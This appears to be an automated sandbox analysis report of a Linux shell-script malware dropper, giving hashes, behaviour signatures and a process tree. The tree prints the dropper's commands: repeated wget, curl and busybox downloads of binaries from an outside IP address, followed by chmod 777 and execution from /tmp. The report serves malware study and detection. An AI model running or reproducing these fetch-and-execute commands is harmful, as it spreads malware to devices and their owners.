Analysis
-
max time kernel
151s -
max time network
154s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
18/10/2024, 02:42
Static task
static1
Behavioral task
behavioral1
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
-
Size
10KB
-
MD5
91ccaeb90f7a1a486a1a1cc72526a2c5
-
SHA1
f4eae2ed37483fd578a41a4edaa29af24ebe85be
-
SHA256
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3
-
SHA512
beb4e0fafb2bc99022e6595d1f0d0e57cd49ae6da6196c900d45f9b3405d9b6a256070fdaf21fff922ed583c8021f0625d81a56fe82e4c7c28ecf1a5578e2d21
-
SSDEEP
192:mploN9In4UdM0DP0B51+JJRzBKOKBiyaploN9s4UdM0XOKBiyX51+JJv7:mploN9In4UdM0DP0EzBBploN9s4UdM0+
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 25 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 941 chmod 748 chmod 833 chmod 853 chmod 807 chmod 910 chmod 953 chmod 820 chmod 826 chmod 892 chmod 904 chmod 923 chmod 734 chmod 757 chmod 775 chmod 929 chmod 886 chmod 898 chmod 916 chmod 935 chmod 947 chmod 742 chmod 873 chmod 880 chmod 959 chmod -
Executes dropped EXE 25 IoCs
ioc pid Process /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL 735 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK 743 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB 749 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I 758 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O 776 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ 808 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S 821 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv 827 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp 835 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 855 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 875 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw 881 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn 887 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A 893 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL 899 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK 905 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB 911 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I 917 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O 924 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ 930 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S 936 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A 942 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv 948 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp 954 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 960 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 curl File opened for modification /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL curl File opened for modification /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK curl File opened for modification /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw curl File opened for modification /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn curl File opened for modification /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S curl File opened for modification /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv curl File opened for modification /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O curl File opened for modification /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv curl File opened for modification /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp curl File opened for modification /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 curl File opened for modification /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL curl File opened for modification /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp curl File opened for modification /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I curl File opened for modification /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ curl File opened for modification /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A curl File opened for modification /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK curl File opened for modification /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I curl File opened for modification /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A curl File opened for modification /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB curl File opened for modification /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S curl File opened for modification /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 curl File opened for modification /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB curl File opened for modification /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O curl File opened for modification /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ curl
Processes
-
/tmp/c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh/tmp/c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh1⤵PID:704
-
/bin/rm/bin/rm bins.sh2⤵PID:711
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:714
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:720
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:732
-
-
/bin/chmodchmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:737
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:738
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:741
-
-
/bin/chmodchmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:744
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:747
-
-
/bin/chmodchmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:750
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:751
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:756
-
-
/bin/chmodchmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Executes dropped EXE
PID:758
-
-
/bin/rmrm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:759
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:772
-
-
/bin/chmodchmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- File and Directory Permissions Modification
PID:775
-
-
/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Executes dropped EXE
PID:776
-
-
/bin/rmrm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:779
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:781
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:793
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:802
-
-
/bin/chmodchmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Executes dropped EXE
PID:808
-
-
/bin/rmrm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:811
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:812
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:819
-
-
/bin/chmodchmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:822
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:825
-
-
/bin/chmodchmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:828
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:829
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:831
-
-
/bin/chmodchmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:836
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:838
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:842
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:850
-
-
/bin/chmodchmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:857
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:859
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:871
-
-
/bin/chmodchmod 777 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7./k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:879
-
-
/bin/chmodchmod 777 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw./ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:885
-
-
/bin/chmodchmod 777 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn./ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:891
-
-
/bin/chmodchmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:897
-
-
/bin/chmodchmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:903
-
-
/bin/chmodchmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:909
-
-
/bin/chmodchmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:915
-
-
/bin/chmodchmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:921
-
-
/bin/chmodchmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:928
-
-
/bin/chmodchmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:931
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:934
-
-
/bin/chmodchmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:937
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:940
-
-
/bin/chmodchmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- File and Directory Permissions Modification
PID:941
-
-
